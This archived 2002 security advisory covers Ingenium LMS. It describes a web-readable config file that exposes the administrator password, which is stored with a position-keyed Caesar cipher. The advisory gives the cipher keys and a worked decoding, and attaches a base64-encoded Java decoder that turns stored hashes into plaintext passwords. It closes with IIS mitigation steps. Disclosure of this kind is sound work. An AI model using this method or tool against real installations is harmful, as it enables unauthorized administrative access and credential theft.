17th Oct 2002 [SBWID-5758]
COMMAND
Ingenium Learning Management Admin Password Vulnerability
SYSTEMS AFFECTED
Ingenium LMS v5.1 and v6.1. It is likely that all versions are
vulnerable. Click2Learn's Aspen LMS has not been tested.
PROBLEM
Thanks to Brian Enigma [enigma@netninja.com] audit :
http://netninja.com/papers/ingenium/
-----------------------
ADMINISTRATOR PASSWORD HASH VISIBILITY
-----------------------
Ingenium stores a number of configuration parameters in a Microsoft SQL
database. It also must store a few values on the local system, as it
needs to know several important values before being able to access the
database--for instance, the location, login, and password for
connecting to the database. Basically this is the database "bootstrap"
information. In examining the file more closely (it is called [install
directory]/config/config.txt), I also noted that the application's
administrator password, as a hashed value, is also stored in this file.
Even further inspection of the file location, directory structure, and
IIS installation shows that the file is located in a folder under the
htdocs web directory! This means that a simple HTTP request can grab
the config file!
In most default installations, replacing the "default.asp" file name in
the URL, when looking at the Ingenium home page, with
"config/config.txt" will retrieve the file, including the administrator
password hash. This is just plain silly! Most web programmers with any
amount of training or experience know that you need to store your data
out-of-band from the documents/programs. Raw data files should not be
web accessible.
While this particular vulnerability is a known issue (see Click2Learn's
Knowledge Base article Q1254), it is brushed off as advice for the
paranoid. Personal observation has not shown a single site that hides
this configuration file. Utilizing this vulnerability leads us to the
importance of the next one.
-----------------------
ADMINISTRATOR PASSWORD HASH DECRYPTION
-----------------------
You may or my not already know that the best way to store passwords in
a persistent data store is with a one-way hash function. In fact, this
is how all Unix systems work. You cannot reverse out a password from a
password hash without a lot of brute force--in most cases, so much
number crunching that the process is not worth it. You may also know
that one of the worst ways to store passwords (or any data) is with XOR
"encryption." Two large enough samples and a minute of math will give
you a pretty darn good idea of what the "encryption" key is. An even
less secure method of encrypting data is with a secret decoder ring. In
fact, most newspapers have a "Cryptogram" section with the Sunday
comics that lets you solve these as a diversion (shameless self-plug:
http://sourceforge.net/projects/cryptoslam/). It is called a Caesar
cypher and is made mildly more challenging/annoying by varying the
offset depending on the position of the letter in the message.
I'll give you three guesses what Ingenium uses to store passwords, but
the first two guesses cannot be "Caesar Cypher." Yes, Ingenium uses
about the same encryption as a Flash Gordon Secret Decoder Ring.
Implementation would have been an exercise left for the reader, but it
was a slow Friday, so the Java source will be supplied with this
advisory. Passwords are not case sensitive--it would appear they are
converted to uppercase before being "encrypted." The example code will
only decode letters and numbers, no special symbols, but the theory
still applies.
In this particular cipher implementation, the key is:
9'$%100'%6
This key repeats if the plaintext is longer than ten characters. To
decode a given piece of cyphertext, you simply take the hex value of
the cyphertext character and subtract the hex value of the key
character in the same position, giving you a plaintext hex characters.
Note that the number space wraps between 0x20 and 0x7D. Just in case
you are not following, an example is in order. Let us say, as an
example, that the password line in config.txt is
"General\LocalAdmin=|smh|#'hp{9'$%10". The decoding goes something like
this:
cypher: |smh|#'hp{9'$%10
subtract key: 9'$%100'%69'$%10
You will note that only the first ten characters are significant. The
rest are nulls in the plaintext, giving the cyphertext character the
same value as the key character at that position. Worked out in hex,
this becomes:
cipher: 7c 73 6d 68 7c 23 27 68 70 7b
subtract key: 39 27 24 25 31 30 30 27 25 36
-----------------------------
equals: 43 4c 49 43 4b 51 55 41 4b 45
in ASCII: C L I C K Q U A K E
You will notice that the "Q" and "U" wrapped down below 0x20, and back
around to 0x7D. Experimentation also shows that the numeric digits are
somehow offset such that zero (normally 0c30) is mapped to lowercase n
(0x6E). Symbols are also mapped into this area, but have not been
completely explored.
-----------------------
USER PASSWORD HASH VISIBILITY
-----------------------
This issue is not as severe as the administrator password. A user will
need SELECT access in the database to utilize this vulnerability. A
simple SELECT * FROM IWC_USR will give you a list of logins and their
corresponding password hashes. The password hash employs the same
algorithm as above, only you will need to remove the "$" at the
beginning of the password hash and use a slightly different key (the
characters "i0)'0+7/" repeated).
--8323328-1491147837-1034640889=:587
Content-Type: TEXT/x-java; name="IngeniumDecoder.java"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0210141714490.587@euclid>
Content-Description: IngeniumDecoder.java
Content-Disposition: attachment; filename="IngeniumDecoder.java"
aW1wb3J0IGphdmF4LnN3aW5nLkpPcHRpb25QYW5lOw0KDQovKioNCiAqIElu
Z2VuaXVtRGVjb2Rlcg0KICogU2ltcGxlIHByb2dyYW0gdG8gZGVjb2RlIHRo
ZSBhZG1pbiBwYXNzd29yZCBoYXNoIHByZXNlbnQgaW4gdGhlIEluZ2VuaXVt
DQogKiBMTVMgY29uZmlnLnR4dCBmaWxlLiAgVGhpcyBmaWxlIGlzIHN0b3Jl
ZCB3aXRoaW4gdGhlIGh0ZG9jcyBkaXJlY3RvcnkNCiAqIHRyZWUsIHNvIGlz
IGF2YWlsYWJsZSB0aHJvdWdoIGEgc2ltcGxlIFVSTC4gIEZvciBpbnN0YW5j
ZSwgaWYgeW91cg0KICogSW5nZW5pdW0gaW5zdGFsbCBpcyBpbiBodHRwOi8v
c3VmZm9say5jbGljazJsZWFybi5jb20vc3VmZm9sa190ZXN0LywgdGhlbg0K
ICogdGhlIGNvbmZpZyBmaWxlIGlzIGxvY2F0ZWQgYXQgDQogKiBodHRwOi8v
c3VmZm9say5jbGljazJsZWFybi5jb20vc3VmZm9sa190ZXN0L2NvbmZpZy9j
b25maWcudHh0LiAgVGhlIHNhbWUNCiAqIHBhc3N3b3JkIGhhc2hpbmcgc2No
ZW1lIGlzIHVzZWQgYm90aCBmb3IgdGhlICJhZG1pbmlzdHJhdG9yIiBsb2dp
biBhY2NvdW50DQogKiBhbmQgdGhlIFNRTCBkYXRhYmFzZSBEU04gcGFzc3dv
cmQuDQogKg0KICogQGF1dGhvciAgQnJpYW4gRW5pZ21hIDxlbmlnbWFAbmV0
bmluamEuY29tPg0KICovDQpwdWJsaWMgY2xhc3MgSW5nZW5pdW1EZWNvZGVy
IHsNCiAgICAvKiogVGhlIGxvdyBlbmQgb2YgdGhlIGtleXNwYWNlICovDQog
ICAgcHVibGljIHN0YXRpYyBpbnQgV1JBUF9CT1RUT00gPSAweDIwOyAvLyBz
cGFjZQ0KICAgIC8qKiBUaGUgaGlnaCBlbmQgb2YgdGhlIGtleXNwYWNlICov
DQogICAgcHVibGljIHN0YXRpYyBpbnQgV1JBUF9UT1AgICAgPSAweDdFOyAv
LyBjbG9zZSBjdXJsZXkgYnJhY2UNCiAgICBwdWJsaWMgc3RhdGljIGludCBD
SEFSX1pFUk8gICA9IDB4NkU7DQogICAgLyoqIFRoZSBzeW1tZXRyaWMga2V5
ICovDQogICAgcHVibGljIHN0YXRpYyBTdHJpbmcgS0VZICAgICAgPSAiOSck
JTEwMCclNiI7DQogICAgDQogICAgLyoqIA0KICAgICAqIEdpdmVuIHNvbWUg
Y3lwaGVydGV4dCwgcHJvZHVjZSB0aGUgcGxhaW50ZXh0LiAgVGhlIGVuY3J5
cHRpb24gbWV0aG9kDQogICAgICogZW1wbG95ZWQgaXMgYSBzaW1wbGUgQ2Fl
c2FyIGN5cGhlciB3aXRoIGEga2V5IHRoYXQgcm90YXRlcyBkZXBlbmRpbmcN
CiAgICAgKiBvbiB0aGUgcG9zaXRpb24gb2YgdGhlIGNoYXJhY3RlciBpbiB0
aGUgcGxhaW50ZXh0L2N5cGhlcnRleHQuICBUaGUNCiAgICAgKiBvZmZzZXQg
aXMgZGV0ZXJtaW5lZCBieSB0aGUgS0VZIHN0cmluZyBhYm92ZS4gIChUaGlz
IGlzIHNpbWlsYXIgdG8NCiAgICAgKiBvYmZ1c2NhdGlvbiB1c2luZyBST1Qt
MTMgY29kaW5nLCBvbmx5IHRoZSAiMTMiIGNoYW5nZXMgYnkgcG9zaXRpb24u
KQ0KICAgICAqDQogICAgICpAcGFyYW0gcyB0aGUgY3lwaGVydGV4dA0KICAg
ICAqQHJldHVybiB0aGUgcGxhaW50ZXh0DQogICAgICovDQogICAgcHVibGlj
IHN0YXRpYyBTdHJpbmcgZGVjb2RlKFN0cmluZyBzKSB7DQogICAgICAgIFN0
cmluZ0J1ZmZlciByZXN1bHQgPSBuZXcgU3RyaW5nQnVmZmVyKCk7DQogICAg
ICAgIGludCBtYXggPSBzLmxlbmd0aCgpOw0KICAgICAgICBmb3IgKGludCBp
PTA7IGk8bWF4OyBpKyspIHsNCiAgICAgICAgICAgIGludCBjeXBoZXJMZXR0
ZXIgPSAoaW50KSBzLmNoYXJBdChpKTsNCiAgICAgICAgICAgIGludCBrZXlM
ZXR0ZXIgPSAoaW50KSBLRVkuY2hhckF0KGkgJSBLRVkubGVuZ3RoKCkpOw0K
ICAgICAgICAgICAgaWYgKGN5cGhlckxldHRlciA9PSBrZXlMZXR0ZXIpDQog
ICAgICAgICAgICAgICAgY29udGludWU7DQogICAgICAgICAgICBpbnQgZGVj
b2RlTGV0dGVyID0gY3lwaGVyTGV0dGVyIC0ga2V5TGV0dGVyOw0KICAgICAg
ICAgICAgaWYgKGRlY29kZUxldHRlciA8IFdSQVBfQk9UVE9NKQ0KICAgICAg
ICAgICAgICAgIGRlY29kZUxldHRlciA9IFdSQVBfVE9QIC0gKFdSQVBfQk9U
VE9NIC0gZGVjb2RlTGV0dGVyKTsNCiAgICAgICAgICAgIGlmICgoZGVjb2Rl
TGV0dGVyID49IENIQVJfWkVSTykgJiYgKGRlY29kZUxldHRlciA8PSBDSEFS
X1pFUk8rMTApKQ0KICAgICAgICAgICAgICAgIHJlc3VsdC5hcHBlbmQoZGVj
b2RlTGV0dGVyIC0gQ0hBUl9aRVJPICsgQ2hhcmFjdGVyLmdldE51bWVyaWNW
YWx1ZSgnMCcpKTsNCiAgICAgICAgICAgIGVsc2UgaWYgKChkZWNvZGVMZXR0
ZXIgPj0gV1JBUF9CT1RUT00pICYmIChkZWNvZGVMZXR0ZXIgPD0gV1JBUF9U
T1ApKQ0KICAgICAgICAgICAgICAgIHJlc3VsdC5hcHBlbmQoQ2hhcmFjdGVy
LnRvU3RyaW5nKChjaGFyKSBkZWNvZGVMZXR0ZXIpKTsNCiAgICAgICAgICAg
IGVsc2UNCiAgICAgICAgICAgICAgICByZXN1bHQuYXBwZW5kKCJbdW5rbm93
biBsZXR0ZXJdIik7DQogICAgICAgIH0NCiAgICAgICAgcmV0dXJuIHJlc3Vs
dC50b1N0cmluZygpOw0KICAgIH0NCiAgICANCiAgICAvKiogQ3JlYXRlcyBh
IG5ldyBpbnN0YW5jZSBvZiBJbmdlbml1bURlY29kZXIgKi8NCiAgICBwcml2
YXRlIEluZ2VuaXVtRGVjb2RlcigpIHsNCiAgICB9DQogICAgDQogICAgcHVi
bGljIHN0YXRpYyB2b2lkIG1haW4oU3RyaW5nW10gYXJndikgew0KICAgICAg
ICAvL1N5c3RlbS5vdXQucHJpbnRsbihkZWNvZGUoInxzbWh8IydocHs5JyQl
MTAiKSk7DQogICAgICAgIFN0cmluZyBoYXNoZWRQYXNzID0gSk9wdGlvblBh
bmUuc2hvd0lucHV0RGlhbG9nKA0KICAgICAgICAgICAgbnVsbCwNCiAgICAg
ICAgICAgICJQbGVhc2UgZW50ZXIgdGhlIFwiaGFzaGVkXCIgYWRtaW4gcGFz
c3dvcmQgZnJvbSBjb25maWcudHh0IiwNCiAgICAgICAgICAgICJFbnRlciBo
YXNoIiwNCiAgICAgICAgICAgIEpPcHRpb25QYW5lLlFVRVNUSU9OX01FU1NB
R0UpOw0KICAgICAgICBpZiAoKGhhc2hlZFBhc3MgIT0gbnVsbCkgJiYgKGhh
c2hlZFBhc3MubGVuZ3RoKCkgPiAwKSkNCiAgICAgICAgICAgIEpPcHRpb25Q
YW5lLnNob3dNZXNzYWdlRGlhbG9nKA0KICAgICAgICAgICAgICAgIG51bGws
IA0KICAgICAgICAgICAgICAgICJUaGUgZGVjb2RlZCBwYXNzd29yZCBpcyAi
ICsgZGVjb2RlKGhhc2hlZFBhc3MpLA0KICAgICAgICAgICAgICAgICJQbGFp
bnRleHQiLA0KICAgICAgICAgICAgICAgIEpPcHRpb25QYW5lLklORk9STUFU
SU9OX01FU1NBR0UpOw0KICAgICAgICBTeXN0ZW0uZXhpdCgwKTsNCiAgICB9
DQogICAgDQp9DQo=
--8323328-1491147837-1034640889=:587--
SOLUTION
A good long-term solution would be a software update from Click2Learn
that moves the files in the "config" directory (and possible others) to
a path outside of the web documents. This requires engineering time and
QA resources. Also, this solution may not apply to entities that
purchased the Ingenium LMS without a support contract.
A simple and immediate solution would be to block the config.txt file
from being downloadable. Configuring IIS to block access to this
directory can achieve the desired result. This is a simple operation. First,
open the Internet Management console. Next locate the "config" web
folder. Right-click on it and select "Properties." Uncheck the "Read" and
"Index" checkboxes and click "OK."
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
